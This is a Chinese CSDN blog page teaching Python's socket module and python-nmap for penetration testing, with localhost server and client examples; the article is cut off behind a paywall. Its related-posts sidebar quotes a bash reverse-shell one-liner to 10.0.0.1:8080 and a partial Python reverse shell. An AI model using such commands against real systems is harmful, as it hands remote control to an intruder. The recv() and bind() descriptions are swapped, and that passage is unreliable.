Python程序设计——安全渗透测试的常见模块

最新推荐文章于 2024-07-14 22:18:32 发布
最新推荐文章于 2024-07-14 22:18:32 发布
阅读量973 收藏 6
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bluepangzi/article/details/115303913
版权

安全渗透测试的常见模块

一、Socket 模块

  Socket模块的主要目的是帮助在网络上的两个程序之间建立信息通道。
  Python中两个基本的Socket模块:

   - 服务端Socket
   - 客户端Socket

1.实例化 Socket 类

   格式为:

   - socket(family,type[,protocal])
实例化的三个参数:

   1. 地址族(family)

   常用的协议族有AF_INET、AF_INET6、AF_LOCAL(或称AF_UNIX、UNIX域Socket)、AF_ROUTE等。

   默认值为socket.AF_INET,通常使用这个默认值即可。

   2. 流(type)

   SOCK_STREAM,这是TCP类型,保证数据顺序及可靠性;(默认值)

   SOCK_DGRAM,用于UDP类型

   SOCK_RAW,这是原始类型,允许对底层协议如IP或ICMP进行直接访问,基本不会用到

   3. 使用的协议

   参数是可选的。通常赋值“0”,由系统自动选择

   TCP类型的Socket格式为:

   - s = socket.socket() ——> 相当于
socket.socket(socket.AF_INET,socket.SOCK_STREAM)。

   UDP类型的Socket格式为:

   - s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

2.Socket常用的函数—服务端函数

bind():

   这个函数由服务端Socket调用,会将之前创建Socket与指定的IP地址和端口进行绑定。如果之前使用了AF_INET初始化Socket,那么这里可以使用元组(host,port)的形式表示地址。

  • s.bind((‘127.0.0.1’,2345))
listen():

   这个函数用于在使用TCP的服务端 开启 监听模式。可以使用一个参数来指定可以挂起的最大连接数量。

  • s.listen(5)
accept():

   这个函数用于在使用TCP的 服务端 接收连接,一般是阻塞态。接受TCP连接并返回(conn,address)

   其中,conn是新的套接字对象,可以用来接收和发送数据;address是连接客户端的地址。

3.客户端的函数

send():

   用于在使用 TCP 时发送数据,利用这个函数可以将string代表的数据发送到已经连接的Socket,返回值是发送字节的数量。
但是可能未将指定的内容全部发送。

  • send(string[,flag])
sendall():

   与send()相类似,也是用于在使用TCP时发送数据,与send()的区别是完整发送TCP数据。将string中的数据发送到连接的套接字,但在返回之前会尝试发送所有数据。成功返回None,失败则抛出异常。

  • sendall(string[,flag])
recv():

   这个函数由服务端Socket调用,会将之前创建Socket与指定的IP地址和端口进行绑定。如果之前使用了AF_INET初始化Socket,那么这里可以使用元组(host,port)的形式表示地址。

  • recv(bufsize[,flag])
  • bind():

   这个函数TCP时接收数据,接收Socket的数据。数据以字符串形式返回,bufsize指定最多可以接收的数量,flag这个参数一般不会使用。

  • s.bind((‘127.0.0.1’,2345))
sendto():

   这个函数用于在使用UDP时发送数据,返回值是发送的字节数。address是形式为(ipaddr,port)的元组,指定远程地址。

  • sendto(string[,flag],address)
recvfrom():

   UDP专用,接收数据,返回数据远端的IP地址和端口,但返回值是(data,address)。其中,data是包含接收数据的字符串,address是发送数据的套接字地址。

  • close():
       关闭socket。

4.使用Socket编写一个简单的服务端和客户端

   可以将程序保存为server.py,然后在编辑器中执行。但是程序简单,也可以直接在Python的命令行中执行。

import socket     
s1 = socket.socket()     
s1.bind(("127.0.0.1",2345))     
s1.listen(5)     
while 1:         
	conn,address = s1.accept()        
	print "a new connect from", address         
	conn.sendall("Hello world")         
	conn.close()

使用connect()函数来连接到目标服务端:

import socket
s2 = socket.socket()
s2.connect(("127.0.0.1",2345))
data = s2.recv(1024)
s2.close()
print 'Received', repr(data)

二、python-nmap模块

Nmap的功能:

  1. 主机发现功能
  2. 端口扫描
  3. 服务及版本检测
  4. 操作系统检测

1.python-nmap

为Nmap功能的 Python 模块文件。

   注意:在Python中正常使用python-nmap模块,必须先在系统中安装Nmap;Windows操作系统下直接下载安装即可。

安装过程

  1. Linux操作系统下的命令:
    sudo apt-get install nmap

  2. 安装python-nmap
    sudo pip install python-nmap
    在这里插入图片描述

  3. 安装成功后,打开终端,启动Python,然后导入Nmap在这里插入图片描述

python-nmap模块的核心:

   PortScanner、PortScannerAsync、PortScannerError、PortScannerHostDict、PortScannerYield等5个类,其中最为重要的是PortScanner类。

2.python-nmap模块类的实例化

PortScanner类

nmap.PortScanner()
在这里插入图片描述

PortScannerAsync类

PortScannerAsync类和PortScanner类的功能相似,可以实现异步扫描
nmap.PortScannerAsync()

最低0.47元/天 解锁文章
bulepangzi
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python端口通信_Python实现TCP/IP协议下的端口转发及重定向示例
weixin_34549315的博客
02-04 1147
首先,我们用webpy写一个简单的网站,监听8080端口,返回“Hello, EverET.org”的页面。然后我们使用我们的forwarding.py,在80端口和8080端口中间建立两条通信管道用于双向通信。此时,我们通过80端口访问我们的服务器。浏览器得到:然后,我们在forwarding.py的输出结果中可以看到浏览器和webpy之间的通信内容。代码:#!/usr/bin/env pyth...
Python渗透测试之流量分析:流量嗅探工具编程
Liu_Bruce的博客
04-23 3863
Python渗透测试之流量分析:流量嗅探工具编程 ​ 不少人存在这样的观点:只要计算机安装各种专业的安全软件,系统及时更新补丁,密码尽可能复杂,那么计算机就会避免遭到入侵。当然这样的确不容易被入侵,但那也只是对传统的病毒、木马而言,在流量攻击面前,这些防护就会显得无能为力。无论何时,当你与其他设备进行通信时就会产生流量,当这些流量脱离了你的计算机后,其安全就不能得到有效的保障,然而这些流量中却包含着你的敏感数据,攻击者完全可以在不入侵你计算机的情况下获得你的敏感数据,这个过程叫流量嗅探。 实验环境: O
pyexp靶机总结
qq_45301512的博客
01-08 557
靶机下载地址:打开靶机.使用nmap扫描出靶机的ip和开放的端口可以看到,靶机开放了1337端口和3306端口1337端口是ssh的端口,3306是mysql数据库的端口根据之前做靶机的经验来看,一般是开放80端口,然后根据网站去找到合适的方法getshell,但是这里没有开放80端口,因此只能考虑1337端口和3306端口那么先对这两个端口进行爆破一波,看是否能爆破出登录的密码由于不知道存在什么用户,因此只能先尝试root用户的爆破。
靶机渗透测试(Mr-Robot: 1)
@小张小张的博客
11-05 1188
靶机渗透测试(Mr-Robot: 1): Vulnhub靶机 Mr-Robot: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(beginner-intermediate.) 目标:This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find 进
python 渗透测试基础-网络通讯
慕容卡卡
03-23 1259
本文转载自【 python 渗透测试基础-网络通讯】https://www.lzfkj.vip/post/20 文章目录python 渗透测试基础-网络通讯简述TCP实例TCP 服务端TCP 客户端运行结果TCP的另外一个客户端TCP的SSL请求客户端UDP实例UDP 服务端UDP 客户端 python 渗透测试基础-网络通讯 简述     在很多情况下,我们所在的测试环境并没有给我们提供很多有利的条件,特别是在一些审计等级高的地方,更是直接断开物理连接;除了这个方式
学生信息管理系统.rar
10-25
《学生信息管理系统——基于Python程序设计实践》 在当今数字化时代,信息管理系统的应用已经渗透到各行各业,教育领域也不例外。学生信息管理系统是学校管理的重要组成部分,它可以帮助学校有效地管理和处理大量...
python178互联网+志愿服务求职招聘系统.rar
04-27
总的来说,"Python178互联网+志愿服务求职招聘系统"不仅展示了Python在Web开发中的应用,还涵盖了数据库管理、用户认证、算法设计、安全策略等多个IT领域的知识点。对于学生进行毕业设计或课程设计,以及对Python ...
Python库 | aat_poc-0.1.tar.gz
02-28
aat_poc库的名字暗示了它可能与网络安全领域相关,尤其是漏洞扫描或渗透测试。"poc"常常被用来表示Proof of Concept(概念验证),通常是指为了证明某个安全漏洞存在的小程序或脚本。因此,aat_poc可能是用于自动化...
Android APP安全评估工具-Drozer.zip
06-12
《Android APP安全评估工具——Drozer详解》 在当今移动互联网时代,Android应用程序的安全性愈发受到关注。作为开发者和安全研究人员,确保APP免受恶意攻击是至关重要的任务。Drozer,一款专为Android应用安全评估...
python+flask大型区块链论坛项目-BBS.zip
01-31
Flask则是Python的一个轻量级Web服务程序,它提供了基础的HTTP服务器功能,以及模板渲染、URL路由等Web开发所需的基本模块。 2. **项目结构** "BBS-master"目录是项目的根目录,通常包含以下部分: - `app`: 包含...
python网络渗透入门_利用Python进行Web渗透测试(四):HTTP协议基础
weixin_39890543的博客
12-10 215
本篇将会涉及:什么是HTTP,以及HTTP的工作方式HTTP的方法一、什么是HTTPHTTP协议HTTP全称超文本传输协议,一个设计用来来客户端和服务器之间进行通信的协议。HTTP在网络世界中属于OSI模型的第七层——应用层,也属于TCP/IP模型的第四层——应用层。关于什么是OSI模型,什么又是TCP/IP模型,简而言之,其是计算机网络世界的一个网络体系结构,用来定义计算机网络及其各个部分通信的...
渗透中反弹shell与端口
千寻的博客
01-03 1815
渗透中反弹shell与端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
Python程序设计-安全渗透测试-情报收集
Xunuannuan的博客
04-26 799
信息收集基础
靶机渗透测试实战(三)——DC-3
weixin_45116657的博客
10-10 3395
实验环境 靶机(DC-3),IP地址未知; 测试机kali,IP地址:192.168.85.131 实验步骤: 1、 主机扫描 命令:1. Arp-scan -l 没有发现靶机IP,判断靶机没有分配到IP地址,因此先进去单用户设置网络 2、重启靶机 2.1> 启动系统后,我们按e键进入grub模式; 2.2> Ctrl +x 进入单用户模式; 2.3> 进入编辑...
Python渗透测试之Scapy模块&情报收集
waqqy的博客
04-25 4022
Scapy模块文件 关于Scapy Scapy是一个由Python语言编写的强大工具,它是大量程序编写人员最喜爱的一个网络模块。 也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。 这个模块相比起Nmap来说,更为底层。可以更为直观地了解到网络中的各种扫描和攻击行为,例如,要检测某一个端口是否开放,只需提供给Nmap一个端口号,而Nmap就会给出一个开放或者关闭的结果,但是并不知道Nmap是怎么做的。 如果想对网络中的各种问题进行深入研究,Scapy无疑是一个更好的选择,可以利用它来产
内网渗透之——内网转发(反弹shell、端口、代理)
热门推荐
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
《JavaSE》---6.<基础语法(Java三大程序控制结构)>
最新发布
m0_73456341的博客
07-14 831
本篇博客主要讲解Java基础语法中的三大结构,一种顺序结构、两大分支结构i(if-else、swich-case)、四大循环结构(while、do while、fot、foreach)
"Python程序设计:pymysql与sqlalchemy模块详解
任务 管理图书馆图书信息任务知识点pymysqlsqlalchemy数据库连接数据库的管理01ONE知识点:pymysql 与 sqlalchemy 模块任务 管理图书馆图书信息sqlalchemysqlalchemy 是 Python 编程语言下的一个 SQL 工具包,采用了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值